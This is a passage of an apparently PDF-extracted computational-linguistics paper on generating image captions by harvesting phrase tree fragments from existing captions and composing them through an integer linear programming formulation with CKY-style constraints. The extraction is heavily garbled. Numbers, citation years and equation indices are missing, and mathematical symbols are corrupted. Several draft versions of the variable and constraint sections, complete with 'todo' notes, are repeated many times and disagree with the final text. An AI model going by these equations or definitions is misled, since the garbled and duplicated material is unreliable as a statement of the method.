depicted image content (i.e. cap- tions). we tap into the last kind of text, using natu- rally occuring pairs of images with natural language descriptions to compose expressive descriptions for query images via tree composition and compression. such automatic image captioning efforts could potentially be useful for many applications: from automatic organization of photo collections, to facil- itating image search with complex natural language queries, to enhancing web accessibility for the vi- sually impaired. on the intellectual side, by learn- ing to describe the visual world from naturally exist- ing web data, our study extends the domains of lan- guage grounding to the highly expressive language that people use in their everyday online activities. there has been a recent spike in efforts to au- tomatically describe visual content in natural lan- guage (yang et al., ; kulkarni et al., ; li et al., ; farhadi et al., ; krishnamoorthy et al., ; elliott and keller, ; yu and siskind, ; socher et al., ). this reflects the long standing understanding that encoding the complex- ities and subtleties of image content often requires more expressive language constructs than a set of tags. now that visual recognition algorithms are be- ginning to produce reliable estimates of image con- tent (perronnin et al., ; deng et al., a; deng et al., ; krizhevsky et al., ), the time seems ripe to begin exploring higher level semantic tasks. there have been two main complementary direc- tions explored for automatic image captioning. the first focuses on describing exactly those items (e.g., objects, attributes) that are detected by vision recog- nition, which subsequently confines what should be described and how (yao et al., ; kulkarni et al., ; kojima et al., ). approaches in this direc- tion could be ideal for various practical applications such as image description for the visually impaired. however, it is not clear whether the semantic expres- siveness of these approaches can eventually scale up to the casual, but highly expressive language peo- transactions of the association for computational linguistics, ( ) – . action editor: hal daume iii. submitted / ; revised / ; published / . c© association for computational linguistics. target'image' a"cow!standing!in!the! water! i!no/ced!that!this!funny! cow!was"staring"at"me" a!bird!hovering!in"the" grass" you!can!see!these! beau/ful!hills!only!in" the"countryside" object' ac/on' stuff' scene' figure : harvesting phrases (as tree fragments) for the target image based on (partial) visual match. ple naturally use in their online activities. in fig- ure , for example, it would be hard to compose “i noticed that this funny cow was staring at me” or “you can see these beautiful hills only in the coun- tryside” in a purely bottom-up manner based on the exact content detected. the key technical bottleneck is that the range of describable content (i.e., objects, attributes, actions) is ultimately confined by the set of items that can be reliably recognized by state-of- the-art vision techniques. the second direction, in a complementary avenue to the first, has explored ways to make use of the rich spectrum of visual descriptions contributed by online citizens (kuznetsova et al., ; feng and lapata, ; mason, ; ordonez et al., ). in these approaches, the set of what can be described can be substantially larger than the set of what can be recognized, where the former is shaped and defined by the data, rather than by humans. this allows the resulting descriptions to be substantially more ex- pressive, elaborate, and interesting than what would be possible in a purely bottom-up manner. our work contributes to this second line of research. one challenge in utilizing naturally existing mul- timodal data, however, is the noisy semantic align- ment between images and text (dodge et al., ; berg et al., ). therefore, we also investi- gate a related task of image caption generalization (kuznetsova et al., ), which aims to improve the semantic image-text alignment by removing bits of text from existing captions that are less likely to be transferable to other images. the high-level idea of our system is to harvest useful bits of text (as tree fragments) from exist- ing image descriptions using detected visual content similarity, and then to compose a new description by selectively combining these extracted (and op- tionally pruned) tree fragments. this overall idea of composition based on extracted phrases is not new in itself (kuznetsova et al., ), however, we make several technical and empirical contributions. first, we propose a novel stochastic tree compo- sition algorithm based on extracted tree fragments that integrates both tree structure and sequence co- hesion into structural inference. our algorithm per- mits a substantially higher level of linguistic expres- siveness, flexibility, and creativity than those based on rules or templates (kulkarni et al., ; yang et al., ; mitchell et al., ), while also address- ing long-distance grammatical relations in a more principled way than those based on hand-coded con- straints (kuznetsova et al., ). second, we address image caption generalization as an optional subtask of image caption generation, and propose a tree compression algorithm that per- forms a light-weight parsing to search for the op- timal set of tree branches to prune. our work is the first to report empirical benefits of automatically compressed captions for image captioning. the proposed approaches attain significantly bet- ter performance for both image caption generaliza- tion and generation tasks over competitive baselines and previous approaches. our work results in an im- proved image caption corpus with automatic gener- alization, which is publicly available. harvesting tree fragments given a query image, we retrieve images that are vi- sually similar to the query image, then extract po- tentially useful segments (i.e., phrases) from their corresponding image descriptions. we then com- pose a new image description using these retrieved text fragments (§ ). extraction of useful phrases is guided by both visual similarity and the syn- tactic parse of the corresponding textual descrip- http://ilp-cky.appspot.com/ tion. this extraction strategy, originally proposed by kuznetsova et al. ( ), attempts to make the best use of linguistic regularities with respect to objects, actions, and scenes, making it possible to obtain richer textual descriptions than what cur- rent state-of-the-art vision techniques can provide in isolation. in all of our experiments we use the captioned image corpus of ordonez et al. ( ), first pre-processing the corpus for relevant content by running deformable part model object detec- tors (felzenszwalb et al., ). for our study, we run detectors for object classes set a high confi- dence threshold for detection. as illustrated in figure , for a query image de- tection, we extract four types of phrases (as tree fragments). first, we retrieve relevant noun phrases from images with visually similar object detections. we use color, texture (leung and malik, ), and shape (dalal and triggs, ; lowe, ) based features encoded in a histogram of vector quantized responses to measure visual similarity. second, we extract verb phrases for which the corresponding noun phrase takes the subject role. third, from those images with “stuff ” detections, e.g.“water”, or “sky” (typically mass nouns), we extract preposi- tional phrases based on similarity of both visual ap- pearance and relative spatial relationships between detected objects and “stuff”. finally, we use global “scene” similarity to extract prepositional phrases referring to the overall scene, e.g., “at the confer- ence,” or “in the market”. we perform this phrase retrieval process for each detected object in the query image and generate one sentence for each object. all sentences are then combined together to produce the final description. optionally, we apply image caption generalization (via compression) (§ ) to all captions in the corpus prior to the phrase extraction and composition. tree composition we model tree composition as constraint optimiza- tion. the input to our algorithm is the set of re- trieved phrases (i.e., tree fragments), as illustrated in § . let p = {p , ...,pl− } be the set of all phrases across the four phrase types (objects, ac- tions, stuff and scene). we assume a mapping func- l distance between classification score vectors (xiao et al., ) tion pt : [ ,l) → t , where t is the set of phrase types, so that the phrase type of pi is pt(i). in ad- dition, let r be the set of pcfg production rules and nt be the set of nonterminal symbols of the pcfg. the goal is to find and combine a good se- quence of phrases g, |g| ≤ |t| = n = , drawn from p , into a final sentence. more concretely, we want to select and order a subset of phrases (at most one phrase of each phrase type) while considering both the parse structure and n-gram cohesion across phrasal boundaries. figure shows a simplified example of a com- posed sentence with its corresponding parse struc- ture. for brevity, the figure shows only one phrase for each phrase type, but in actuality there would be a set of candidate phrases for each type. figure shows the cky-style representation of the internal mechanics of constraint optimization for the exam- ple composition from figure . each cell ij of the cky matrix corresponds to gij, a subsequence of g starting at position i and ending at position j. if a cell in the cky matrix is labeled with a nontermi- nal symbol s, it means that the corresponding tree of gij has s as its root. although we visualize the operation using a cky- style representation in figure , note that composi- tion requires more complex combinatorial decisions than cky parsing due to two additional considera- tions. we are: ( ) selecting a subset of candidate phrases, and ( ) re-ordering the selected phrases (hence making the problem np-hard). therefore, we encode our problem using integer linear pro- gramming (ilp) (roth and tau yih, ; clarke and lapata, ) and use the cplex (ilog, inc, ) solver. . ilp variables variables for sequence structure: variables α en- code phrase selection and ordering: αik = iff phrase i ∈ p is selected ( ) for position k ∈ [ ,n) where k is one of the n= positions in a sentence. additionally, we define variables for each pair of ad- jacent phrases to capture sequence cohesion: the number of positions is equal to the number of phrase types, since we select at most one from each type. a"cow in"the"countryside was"staring"at"me in#the#grass np pp vp pp np s i= $ j= $k= $ level and each node of that level, algorithm has to decide, which parse tag to choose. this process is represented by assignment of a particular tag to a matrix cell. the chosen tag must be a head of a rule, fi example cell is assigned tag v p , correspond- ing to rule v p ! v p pp . this rule connects leafs “going out to sea” and “in the ocean”. the prob- lem is to find tag assignment for each cell of the ma- trix, given some cells can be empty, if they do not connect children cells. latter correspond to children branches of the tree and belong to the previous diag- onal in the left-to-right order. also we do not try all possible pairs of children from previous diagonal. we use technique similar to the one used in cky parsing approach. matrix cell pairs corresponding to <right,left> children pairs are < ik, (k + )j >, where k [i, j). here and for the remainder of the paper, notation [i, j) means {i, i + , ..., j � } and r is h pq unless otherwise stated. the problem of choosing phrase order together with the best parse tree of the description is a com- plex optimization problem, which we solve using integer linear programming (ilp). we use a sepa- rate ilp formulation for for sentence reordering and salient object selection, which we omit for brevity. as mentioned earlier, overall for each object we have four types of phrases. we use cky-driven ilp formulation to combine them together into a plausi- ble descriptions which obeys pcfg rules. for the remainder of the paper we will call our ilp formu- lation ilp-tree. we exploit cplex (ilog, inc, ) to solve ilp problem. todo:[mention cplex parameters. for instance, sec limit on generation] . . ilp variables phrase indicator variables: we define variables ↵ which indicate phrase selection and phrase ordering. ↵ijk = iff phrase i of type j ( ) is selected for position k there is only two children as we use chomsky normal form ↵ij = ↵ij pq = � s = � (np!np pp) = � = where k [ , n)todo:[check for the whole pa- per if k ranges from ] indexes one of n= positions in a sentence . phrase ordering is captured by indicator variables for adjacent pairs of phrases: ↵ijkpq(k+ ) = iff ↵ijk = ↵pq(k+ ) = ( ) an example of ilp-cky at figure shows selec- tion of phrases and their ordering: “the little boat”, “going out to sea” and “in the ocean”. tree indicator variables: we also define variables �, which are indicators of cky matrix content (fig- ure ). �ijs = iff cell ij of the matrix is assigned ( ) parse tree symbol s todo:[rename symbols to tags throughout the pa- per] where i [ , n) indexes cky matrix diagonals and j [ , n � i) indexes elements of diagonal i. in order to model rule selection at each cky step, we define variables, which correspond to a pcfg rule used at the given cell ij of cky matrix: �ijkr = iff �ijh = �ikp ( ) = �(k+ )jq = , where r = h pq r and k [i, j). value k corresponds to the choice of children for the current cell. the number of positions is equal to the number of phrase types figure : an example scenario of tree composition. only the first three phrases are chosen for the composition. αijk = iff αik = αj(k+ ) = ( ) variables for tree structure: variables β encode the parse structure: βijs = iff the phrase sequence gij ( ) maps to the nonterminal symbol s ∈ nt where i ∈ [ ,n) and j ∈ [i,n) index rows and columns of the cky-style matrix in figure . a cor- responding example tree is shown in figure , where the phrase sequence g corresponds to the cell la- beled with s. we also define variables to indicate selected pcfg rules in the resulting parse: βijkr = iff βijh = βikp ( ) = β(k+ )jq = , where r = h → pq ∈ r and k ∈ [i,j). index k points to the boundary of split between two children as shown in figure for the sequence g . auxiliary variables: for notational convenience, we also include: γijk = iff ∑ s∈nt βijs ( ) = ∑ s∈nt βiks = ∑ s∈nt β(k+ )js = . ilp objective function we model tree composition as maximization of the following objective function: f = ∑ i fi × n− ∑ k= αik ( ) + ∑ ij fij × n− ∑ k= αijk + ∑ ij j− ∑ k=i ∑ r∈r fr ×βijkr np np s a"cow pp pp-vp in"the" countryside vp vp was"staring" at"me pp in#the#grass " " " " " " " " " " k= $ k= $ level and each node of that level, algorithm has to decide, which parse tag to choose. this process is represented by assignment of a particular tag to a matrix cell. the chosen tag must be a head of a rule, fi example cell is assigned tag v p , correspond- ing to rule v p ! v p pp . this rule connects leafs “going out to sea” and “in the ocean”. the prob- lem is to find tag assignment for each cell of the ma- trix, given some cells can be empty, if they do not connect children cells. latter correspond to children branches of the tree and belong to the previous diag- onal in the left-to-right order. also we do not try all possible pairs of children from previous diagonal. we use technique similar to the one used in cky parsing approach. matrix cell pairs corresponding to <right,left> children pairs are < ik, (k + )j >, where k [i, j). here and for the remainder of the paper, notation [i, j) means {i, i + , ..., j � } and r is h pq unless otherwise stated. the problem of choosing phrase order together with the best parse tree of the description is a com- plex optimization problem, which we solve using integer linear programming (ilp). we use a sepa- rate ilp formulation for for sentence reordering and salient object selection, which we omit for brevity. as mentioned earlier, overall for each object we have four types of phrases. we use cky-driven ilp formulation to combine them together into a plausi- ble descriptions which obeys pcfg rules. for the remainder of the paper we will call our ilp formu- lation ilp-tree. we exploit cplex (ilog, inc, ) to solve ilp problem. todo:[mention cplex parameters. for instance, sec limit on generation] . . ilp variables phrase indicator variables: we define variables ↵ which indicate phrase selection and phrase ordering. ↵ijk = iff phrase i of type j ( ) is selected for position k there is only two children as we use chomsky normal form ↵ij = ↵ij pq = � s = � (np!np pp) = � = where k [ , n)todo:[check for the whole pa- per if k ranges from ] indexes one of n= positions in a sentence . phrase ordering is captured by indicator variables for adjacent pairs of phrases: ↵ijkpq(k+ ) = iff ↵ijk = ↵pq(k+ ) = ( ) an example of ilp-cky at figure shows selec- tion of phrases and their ordering: “the little boat”, “going out to sea” and “in the ocean”. tree indicator variables: we also define variables �, which are indicators of cky matrix content (fig- ure ). �ijs = iff cell ij of the matrix is assigned ( ) parse tree symbol s todo:[rename symbols to tags throughout the pa- per] where i [ , n) indexes cky matrix diagonals and j [ , n � i) indexes elements of diagonal i. in order to model rule selection at each cky step, we define variables, which correspond to a pcfg rule used at the given cell ij of cky matrix: �ijkr = iff �ijh = �ikp ( ) = �(k+ )jq = , where r = h pq r and k [i, j). value k corresponds to the choice of children for the current cell. the number of positions is equal to the number of phrase types level and each node of that level, algorithm has to decide, which parse tag to choose. this process is represented by assignment of a particular tag to a matrix cell. the chosen tag must be a head of a rule, fi example cell is assigned tag v p , correspond- ing to rule v p ! v p pp . this rule connects leafs “going out to sea” and “in the ocean”. the prob- lem is to find tag assignment for each cell of the ma- trix, given some cells can be empty, if they do not connect children cells. latter correspond to children branches of the tree and belong to the previous diag- onal in the left-to-right order. also we do not try all possible pairs of children from previous diagonal. we use technique similar to the one used in cky parsing approach. matrix cell pairs corresponding to <right,left> children pairs are < ik, (k + )j >, where k [i, j). here and for the remainder of the paper, notation [i, j) means {i, i + , ..., j � } and r is h pq unless otherwise stated. the problem of choosing phrase order together with the best parse tree of the description is a com- plex optimization problem, which we solve using integer linear programming (ilp). we use a sepa- rate ilp formulation for for sentence reordering and salient object selection, which we omit for brevity. as mentioned earlier, overall for each object we have four types of phrases. we use cky-driven ilp formulation to combine them together into a plausi- ble descriptions which obeys pcfg rules. for the remainder of the paper we will call our ilp formu- lation ilp-tree. we exploit cplex (ilog, inc, ) to solve ilp problem. todo:[mention cplex parameters. for instance, sec limit on generation] . . ilp variables phrase indicator variables: we define variables ↵ which indicate phrase selection and phrase ordering. ↵ijk = iff phrase i of type j ( ) is selected for position k there is only two children as we use chomsky normal form ↵ij = ↵ij pq = � s = � (np!np pp) = � = where k [ , n)todo:[check for the whole pa- per if k ranges from ] indexes one of n= positions in a sentence . phrase ordering is captured by indicator variables for adjacent pairs of phrases: ↵ijkpq(k+ ) = iff ↵ijk = ↵pq(k+ ) = ( ) an example of ilp-cky at figure shows selec- tion of phrases and their ordering: “the little boat”, “going out to sea” and “in the ocean”. tree indicator variables: we also define variables �, which are indicators of cky matrix content (fig- ure ). �ijs = iff cell ij of the matrix is assigned ( ) parse tree symbol s todo:[rename symbols to tags throughout the pa- per] where i [ , n) indexes cky matrix diagonals and j [ , n � i) indexes elements of diagonal i. in order to model rule selection at each cky step, we define variables, which correspond to a pcfg rule used at the given cell ij of cky matrix: �ijkr = iff �ijh = �ikp ( ) = �(k+ )jq = , where r = h pq r and k [i, j). value k corresponds to the choice of children for the current cell. the number of positions is equal to the number of phrase types level and each node of that level, algorithm has to decide, which parse tag to choose. this process is represented by assignment of a particular tag to a matrix cell. the chosen tag must be a head of a rule, fi example cell is assigned tag v p , correspond- ing to rule v p ! v p pp . this rule connects leafs “going out to sea” and “in the ocean”. the prob- lem is to find tag assignment for each cell of the ma- trix, given some cells can be empty, if they do not connect children cells. latter correspond to children branches of the tree and belong to the previous diag- onal in the left-to-right order. also we do not try all possible pairs of children from previous diagonal. we use technique similar to the one used in cky parsing approach. matrix cell pairs corresponding to <right,left> children pairs are < ik, (k + )j >, where k [i, j). here and for the remainder of the paper, notation [i, j) means {i, i + , ..., j � } and r is h pq unless otherwise stated. the problem of choosing phrase order together with the best parse tree of the description is a com- plex optimization problem, which we solve using integer linear programming (ilp). we use a sepa- rate ilp formulation for for sentence reordering and salient object selection, which we omit for brevity. as mentioned earlier, overall for each object we have four types of phrases. we use cky-driven ilp formulation to combine them together into a plausi- ble descriptions which obeys pcfg rules. for the remainder of the paper we will call our ilp formu- lation ilp-tree. we exploit cplex (ilog, inc, ) to solve ilp problem. todo:[mention cplex parameters. for instance, sec limit on generation] . . ilp variables phrase indicator variables: we define variables ↵ which indicate phrase selection and phrase ordering. ↵ijk = iff phrase i of type j ( ) is selected for position k there is only two children as we use chomsky normal form ↵ij = ↵ij pq = � s = � (np!np pp) = � = where k [ , n)todo:[check for the whole pa- per if k ranges from ] indexes one of n= positions in a sentence . phrase ordering is captured by indicator variables for adjacent pairs of phrases: ↵ijkpq(k+ ) = iff ↵ijk = ↵pq(k+ ) = ( ) an example of ilp-cky at figure shows selec- tion of phrases and their ordering: “the little boat”, “going out to sea” and “in the ocean”. tree indicator variables: we also define variables �, which are indicators of cky matrix content (fig- ure ). �ijs = iff cell ij of the matrix is assigned ( ) parse tree symbol s todo:[rename symbols to tags throughout the pa- per] where i [ , n) indexes cky matrix diagonals and j [ , n � i) indexes elements of diagonal i. in order to model rule selection at each cky step, we define variables, which correspond to a pcfg rule used at the given cell ij of cky matrix: �ijkr = iff �ijh = �ikp ( ) = �(k+ )jq = , where r = h pq r and k [i, j). value k corresponds to the choice of children for the current cell. the number of positions is equal to the number of phrase types k= $ of two variables have been discussed by clarke and lapata ( ). for equation , we add the follow- ing constraints (similar constraints are also added for equations , ). ijkpqm, ↵ijk  ↵ik ( ) ↵ijk  ↵j(k+ ) ↵ijk + ( � ↵ik) + ( � ↵j(k+ )) � consistency between tree leafs and sequences: the ordering of phrases implied by ↵ijk must be consistent with the ordering of phrases implied by the � variables. this can be achieved by aligning the leaf cells (i.e., �kks) in the cky-style matrix with ↵ variables as follows: ik, ↵ik  x s si �kks ( ) k, x i ↵ik = x s s �kks ( ) where si refers to the set of pcfg nonterminals that are compatible with the phrase type of pi. for example, si = {nn,np, ...} if pi corresponds to an “object” (noun-phrase). thus, equation en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. equation enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. tree congruence constraints: to ensure that each cky cell has at most one symbol we require ij, x s s �ijs  ( ) we also require that i,j>i,h, �ijh = j� x k=i x r rh �ijkr ( ) where rh = {r r : r = h ! pq}. we enforce these constraints only for non-leafs. this constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing pcfg rule. we also ensure that we produce a valid tree struc- ture. for instance, if we select phrases as shown in figure , we must have the root of the tree at the corresponding cell . k [ ,n), x s s �kks  n� x t=k x s s � ts ( ) we also require cells that are not selected for the resulting parse structure to be empty: ij x k �ijk  ( ) ↵i = ( ) ↵ij = ( ) additionally, we penalize solutions without the s tag at the parse root as a soft-constraint. miscellaneous constraints: finally, we include several constraints to avoid degenerate solutions or otherwise to enhance the composed output: ( ) en- force that a noun-phrase is selected (to ensure se- mantic relevance to the image content), ( ) allow at most one phrase of each type, ( ) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), ( ) allow at most one scene phrase for all sentences in the description. we find that han- dling of sentence boundaries is important if the ilp formulation is based only on sequence structure, but with the integration of tree-based structure, we need not handle sentence boundaries. . discussion an interesting aspect of description generation ex- plored in this paper is that building blocks of com- position are tree fragments, rather than individual words. there are three practical benefits: ( ) syn- tactic and semantic expressiveness, ( ) correctness, and ( ) computational efficiency. because we ex- tract nice segments from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. our phrase extraction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. also, because the unit of operation is tree frag- ments, the ilp formulation encoded in this work is computationally lightweight. if the unit of compo- sition was words, the ilp instances would be sig- nificantly more computationally intensive, and more likely to suffer from grammatical and semantic er- rors. of two variables have been discussed by clarke and lapata ( ). for equation , we add the follow- ing constraints (similar constraints are also added for equations , ). ijkpqm, ↵ijk  ↵ik ( ) ↵ijk  ↵j(k+ ) ↵ijk + ( � ↵ik) + ( � ↵j(k+ )) � consistency between tree leafs and sequences: the ordering of phrases implied by ↵ijk must be consistent with the ordering of phrases implied by the � variables. this can be achieved by aligning the leaf cells (i.e., �kks) in the cky-style matrix with ↵ variables as follows: ik, ↵ik  x s si �kks ( ) k, x i ↵ik = x s s �kks ( ) where si refers to the set of pcfg nonterminals that are compatible with the phrase type of pi. for example, si = {nn,np, ...} if pi corresponds to an “object” (noun-phrase). thus, equation en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. equation enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. tree congruence constraints: to ensure that each cky cell has at most one symbol we require ij, x s s �ijs  ( ) we also require that i,j>i,h, �ijh = j� x k=i x r rh �ijkr ( ) where rh = {r r : r = h ! pq}. we enforce these constraints only for non-leafs. this constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing pcfg rule. we also ensure that we produce a valid tree struc- ture. for instance, if we select phrases as shown in figure , we must have the root of the tree at the corresponding cell . k [ ,n), x s s �kks  n� x t=k x s s � ts ( ) we also require cells that are not selected for the resulting parse structure to be empty: ij x k �ijk  ( ) ↵i = ( ) ↵ij = ( ) additionally, we penalize solutions without the s tag at the parse root as a soft-constraint. miscellaneous constraints: finally, we include several constraints to avoid degenerate solutions or otherwise to enhance the composed output: ( ) en- force that a noun-phrase is selected (to ensure se- mantic relevance to the image content), ( ) allow at most one phrase of each type, ( ) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), ( ) allow at most one scene phrase for all sentences in the description. we find that han- dling of sentence boundaries is important if the ilp formulation is based only on sequence structure, but with the integration of tree-based structure, we need not handle sentence boundaries. . discussion an interesting aspect of description generation ex- plored in this paper is that building blocks of com- position are tree fragments, rather than individual words. there are three practical benefits: ( ) syn- tactic and semantic expressiveness, ( ) correctness, and ( ) computational efficiency. because we ex- tract nice segments from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. our phrase extraction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. also, because the unit of operation is tree frag- ments, the ilp formulation encoded in this work is computationally lightweight. if the unit of compo- sition was words, the ilp instances would be sig- nificantly more computationally intensive, and more likely to suffer from grammatical and semantic er- rors. of two variables have been discussed by clarke and lapata ( ). for equation , we add the follow- ing constraints (similar constraints are also added for equations , ). ijkpqm, ↵ijk  ↵ik ( ) ↵ijk  ↵j(k+ ) ↵ijk + ( � ↵ik) + ( � ↵j(k+ )) � consistency between tree leafs and sequences: the ordering of phrases implied by ↵ijk must be consistent with the ordering of phrases implied by the � variables. this can be achieved by aligning the leaf cells (i.e., �kks) in the cky-style matrix with ↵ variables as follows: ik, ↵ik  x s si �kks ( ) k, x i ↵ik = x s s �kks ( ) where si refers to the set of pcfg nonterminals that are compatible with the phrase type of pi. for example, si = {nn,np, ...} if pi corresponds to an “object” (noun-phrase). thus, equation en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. equation enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. tree congruence constraints: to ensure that each cky cell has at most one symbol we require ij, x s s �ijs  ( ) we also require that i,j>i,h, �ijh = j� x k=i x r rh �ijkr ( ) where rh = {r r : r = h ! pq}. we enforce these constraints only for non-leafs. this constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing pcfg rule. we also ensure that we produce a valid tree struc- ture. for instance, if we select phrases as shown in figure , we must have the root of the tree at the corresponding cell . k [ ,n), x s s �kks  n� x t=k x s s � ts ( ) we also require cells that are not selected for the resulting parse structure to be empty: ij x k �ijk  ( ) fi ( ) fij ( ) additionally, we penalize solutions without the s tag at the parse root as a soft-constraint. miscellaneous constraints: finally, we include several constraints to avoid degenerate solutions or otherwise to enhance the composed output: ( ) en- force that a noun-phrase is selected (to ensure se- mantic relevance to the image content), ( ) allow at most one phrase of each type, ( ) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), ( ) allow at most one scene phrase for all sentences in the description. we find that han- dling of sentence boundaries is important if the ilp formulation is based only on sequence structure, but with the integration of tree-based structure, we need not handle sentence boundaries. . discussion an interesting aspect of description generation ex- plored in this paper is that building blocks of com- position are tree fragments, rather than individual words. there are three practical benefits: ( ) syn- tactic and semantic expressiveness, ( ) correctness, and ( ) computational efficiency. because we ex- tract nice segments from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. our phrase extraction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. also, because the unit of operation is tree frag- ments, the ilp formulation encoded in this work is computationally lightweight. if the unit of compo- sition was words, the ilp instances would be sig- nificantly more computationally intensive, and more likely to suffer from grammatical and semantic er- rors. of two variables have been discussed by clarke and lapata ( ). for equation , we add the follow- ing constraints (similar constraints are also added for equations , ). ijkpqm, ↵ijk  ↵ik ( ) ↵ijk  ↵j(k+ ) ↵ijk + ( � ↵ik) + ( � ↵j(k+ )) � consistency between tree leafs and sequences: the ordering of phrases implied by ↵ijk must be consistent with the ordering of phrases implied by the � variables. this can be achieved by aligning the leaf cells (i.e., �kks) in the cky-style matrix with ↵ variables as follows: ik, ↵ik  x s si �kks ( ) k, x i ↵ik = x s s �kks ( ) where si refers to the set of pcfg nonterminals that are compatible with the phrase type of pi. for example, si = {nn,np, ...} if pi corresponds to an “object” (noun-phrase). thus, equation en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. equation enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. tree congruence constraints: to ensure that each cky cell has at most one symbol we require ij, x s s �ijs  ( ) we also require that i,j>i,h, �ijh = j� x k=i x r rh �ijkr ( ) where rh = {r r : r = h ! pq}. we enforce these constraints only for non-leafs. this constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing pcfg rule. we also ensure that we produce a valid tree struc- ture. for instance, if we select phrases as shown in figure , we must have the root of the tree at the corresponding cell . k [ ,n), x s s �kks  n� x t=k x s s � ts ( ) we also require cells that are not selected for the resulting parse structure to be empty: ij x k �ijk  ( ) fi ( ) fij ( ) additionally, we penalize solutions without the s tag at the parse root as a soft-constraint. miscellaneous constraints: finally, we include several constraints to avoid degenerate solutions or otherwise to enhance the composed output: ( ) en- force that a noun-phrase is selected (to ensure se- mantic relevance to the image content), ( ) allow at most one phrase of each type, ( ) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), ( ) allow at most one scene phrase for all sentences in the description. we find that han- dling of sentence boundaries is important if the ilp formulation is based only on sequence structure, but with the integration of tree-based structure, we need not handle sentence boundaries. . discussion an interesting aspect of description generation ex- plored in this paper is that building blocks of com- position are tree fragments, rather than individual words. there are three practical benefits: ( ) syn- tactic and semantic expressiveness, ( ) correctness, and ( ) computational efficiency. because we ex- tract nice segments from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. our phrase extraction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. also, because the unit of operation is tree frag- ments, the ilp formulation encoded in this work is computationally lightweight. if the unit of compo- sition was words, the ilp instances would be sig- nificantly more computationally intensive, and more likely to suffer from grammatical and semantic er- rors. figure : cky-style representation of decision variables as defined in § . for the tree example in fig . non- terminal symbols in boldface (in blue) and solid arrows (also in blue) represent the chosen pcfg rules to com- bine the selected set of phrases. nonterminal symbols in smaller font (in red) and dotted arrows (also in red) rep- resent possible other choices that are not selected. this objective is comprised of three types of weights (confidence scores): fi,fij,fr. fi represents the phrase selection score based on visual similarity, de- scribed in § . fij quantifies the sequence cohe- sion across phrase boundaries. for this, we use n- gram scores (n ∈ [ , ]) between adjacent phrases computed using the google web -t corpus (brants and franz., ). finally, fr quantifies pcfg rule scores (log probabilities) estimated from the m im- age caption corpus (ordonez et al., ) parsed us- ing the stanford parser (klein and manning, ). one can view fi as a content selection score, while fij and fr correspond to linguistic fluency scores capturing sequence and tree structure respec- tively. if we set positive values for all of these weights, the optimization function would be biased toward verbose production, since selecting an addi- tional phrase will increase the objective function. to control for verbosity, we set scores corresponding to linguistic fluency, i.e., fij and fr using negative values (smaller absolute values for higher fluency), to balance dynamics between content selection and linguistic fluency. . ilp constraints soundness constraints: we need constraints to enforce consistency between different types of vari- all weights are normalized using z-score. ables (equations , , ). constraints for a product of two variables have been discussed by clarke and lapata ( ). for equation , we add the follow- ing constraints (similar constraints are also added for equations , ). ∀ijk, αijk ≤ αik ( ) αijk ≤ αj(k+ ) αijk + ( −αik) + ( −αj(k+ )) ≥ consistency between tree leafs and sequences: the ordering of phrases implied by αijk must be consistent with the ordering of phrases implied by the β variables. this can be achieved by aligning the leaf cells (i.e., βkks) in the cky-style matrix with α variables as follows: ∀ik,αik ≤ ∑ s∈nt i βkks ( ) ∀k, ∑ i αik = ∑ s∈nt βkks ( ) where nt i refers to the set of pcfg nonterminals that are compatible with a phrase type pt(i) of pi. for example, nt i = {nn,np, ...} if pi corresponds to an “object” (noun-phrase). thus, equation en- forces the correspondence between phrase types and nonterminal symbols at the tree leafs. equation enforces the constraint that the number of selected phrases and instantiated tree leafs must be the same. tree congruence constraints: to ensure that each cky cell has at most one symbol we require ∀ij, ∑ s∈nt βijs ≤ ( ) we also require that ∀i,j>i,h, βijh = j− ∑ k=i ∑ r∈rh βijkr ( ) where rh = {r ∈ r : r = h → pq}. we enforce these constraints only for non-leafs. this constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a correspond- ing pcfg rule. we also ensure that we produce a valid tree struc- ture. for instance, if we select phrases as shown in figure , we must have the root of the tree at the corresponding cell . ∀k∈[ ,n), ∑ s∈nt βkks ≤ n− ∑ t=k ∑ s∈nt β ts ( ) we also require cells that are not selected for the resulting parse structure to be empty: ∀ij ∑ k γijk ≤ ( ) additionally, we penalize solutions without the s tag at the parse root as a soft-constraint. miscellaneous constraints: finally, we include several constraints to avoid degenerate solutions or to otherwise enhance the composed output. we: ( ) enforce that a noun-phrase is selected (to ensure se- mantic relevance to the image content), ( ) allow at most one phrase of each type, ( ) do not allow mul- tiple phrases with identical headwords (to avoid re- dundancy), ( ) allow at most one scene phrase for all sentences in the description. we find that han- dling of sentence boundaries is important if the ilp formulation is based only on sequence structure, but with the integration of tree-based structure, we do not need to specifically handle sentence boundaries. . discussion an interesting aspect of description generation ex- plored in this paper is using tree fragments as the building blocks of composition rather than individ- ual words. there are three practical benefits: ( ) syntactic and semantic expressiveness, ( ) correct- ness, and ( ) computational efficiency. because we extract phrases from human written captions, we are able to use expressive language, and less likely to make syntactic or semantic errors. our phrase ex- traction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. also, because the unit of operation is tree fragments, the ilp formulation encoded in this work is com- putationally lightweight. if the unit of composition was words, the ilp instances would be significantly more computationally intensive, and more likely to suffer from grammatical and semantic errors. tree compression as noted by recent studies (mason and charniak, ; kuznetsova et al., ; jamieson et 